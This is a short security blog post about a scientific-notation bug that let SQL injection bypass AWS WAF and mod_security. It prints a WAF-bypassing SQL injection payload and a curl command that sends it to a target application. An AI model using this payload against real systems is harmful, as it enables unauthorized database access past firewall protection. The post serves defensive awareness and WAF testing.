AWS WAF and mod_security Apache module were affected by a scientific notation bug discovered back in 2013 that allowed to bypass the WAF to successfully exploit a SQL injection vulnerability.

Find below the payload used for the attack showing the scientific notation:

"x=1' or 1.e(1) or '1'='1"

Executing the following command it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"

More info:

https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/

How useful was this post?

Click on a star to rate it!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Reply